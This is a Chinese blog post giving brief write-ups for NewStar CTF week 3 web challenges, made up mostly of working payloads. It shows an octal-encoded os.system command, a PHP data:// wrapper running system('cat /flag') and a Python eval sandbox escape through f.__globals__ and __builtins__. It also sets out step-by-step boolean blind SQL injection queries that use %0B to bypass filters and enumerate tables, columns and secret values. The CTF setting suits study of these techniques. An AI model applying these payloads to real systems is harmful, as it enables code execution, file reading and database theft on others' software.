NewStar CTF week3

benben Posted on Oct 24 2024

# Web
## 臭皮的计算机
```
os.system('cat /flag')
然后转八进制
\157\163\56\163\171\163\164\145\155\50\47\143\141\164\40\57\146\154\141\147\47\51
```
## Include Me
了解php为协议即可做出来
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKT8%2B
## 
```
?student_name=Bob'and'3'>'2%23

```
## 臭皮踩踩背
```
//f.__globals__['__builtins__'].__import__('os').system('cat /flag')

你被豌豆关在一个监狱里，，，，，，
豌豆百密一疏，不小心遗漏了一些东西，，，
def ev4l(*args):
        print(secret)
inp = input("> ")
f = lambda: None
print(eval(inp, {"__builtins__": None, 'f': f, 'eval': ev4l}))
能不能逃出去给豌豆踩踩背就看你自己了，臭皮，，
> f.__globals__['__builtins__'].__import__('os').system('cat /flag')
flag{a7e1ff73-81a6-4253-9f21-5d552b0dabfd}
0

```
![title](/api/file/getImage?fileId=670f2c293f07ec04d00000e7)
## blindsql1
```
//获取数据库名称长度length(database())>2
?student_name=Bob'AND%0B(SELECT%0BLEFT(database(),3))%0BLIKE'ctf'%23 ///数据库名称为ctf
Bob'AND%0B(SELECT%0Bdatabase())%0BLIKE%0B'ctf'%23
//表名数量
student_name=Bob'AND%0B(SELECT%0BCOUNT(*)%0BFROM%0Binformation_schema.tables%0BWHERE%0Btable_schema%0BLIKE%0B'ctf')%0BLIKE%0B'3'%23 //表名数量为3

//获取表名长度
Bob'And%0B(select%0Blength(TABLE_NAME)%0Bfrom%0Binformation_schema.TABLES%0Bwhere%0BTABLE_SCHEMA%0BLIKE%0Bdatabase()%0Blimit%0B0,1)%0BLIKE%0B8%23  //第一个表长度8
Bob'And%0B(select%0Blength(TABLE_NAME)%0Bfrom%0Binformation_schema.TABLES%0Bwhere%0BTABLE_SCHEMA%0BLIKE%0Bdatabase()%0Blimit%0B1,1)%0BLIKE%0B7%23 //第二个表长度7
Bob'And%0B(select%0Blength(TABLE_NAME)%0Bfrom%0Binformation_schema.TABLES%0Bwhere%0BTABLE_SCHEMA%0BLIKE%0Bdatabase()%0Blimit%0B2,1)%0BLIKE%0B7%23 //第三个表长度7
//猜解第一个表名
Bob'AND%0BMID((SELECT%0BTABLE_NAME%0BFROM%0Binformation_schema.TABLES%0BWHERE%0BTABLE_SCHEMA%0BLIKE%0B'ctf'%0BLIMIT%0B0,1),1,1)%0BLIKE%0B'a'%23
Bob'AND%0BMID((SELECT%0BTABLE_NAME%0BFROM%0Binformation_schema.TABLES%0BWHERE%0BTABLE_SCHEMA%0BLIKE%0B'ctf'%0BLIMIT%0Bx,1),x,1)%0BLIKE%0B'a'%23
studEnts //第一个表名
Courses //第二个表名
secrets //第三个表名
//猜解第三个表的字段的总数
Bob'AND%0B(select%0Bcount(column_name)%0Bfrom%0Binformation_schema.COLUMNS%0Bwhere%0BTABLE_NAME%0BLIKE%0B'secrets')>5%23
Bob'AND%0B(select%0Bcount(column_name)%0Bfrom%0Binformation_schema.COLUMNS%0Bwhere%0BTABLE_NAME%0BLIKE%0B'secrets')%0BLIKE%0B3%23 //字段总数3
//猜测字段名
Bob'AND%0Bmid((select%0BCOLUMN_NAME%0Bfrom%0Binformation_schema.COLUMNS%0Bwhere%0BTABLE_NAME%0BLIKE%0B'secrets'%0Blimit%0B2,1),x,1)%0BLIKE%0B'i'%23
id	secret_key		secret_value
//猜解内容
Bob'AND%0Bmid((select%0Bsecret_value%0Bfrom%0Bsecrets%0Blimit%0Bx,1),x,1)%0BLIKE%0B'x'%23
secret_key=wish,dream,flag
secret_value=i want a girlfriend,i want to be a good ctfer,flag{xxx}
```

赠人玫瑰，手留余香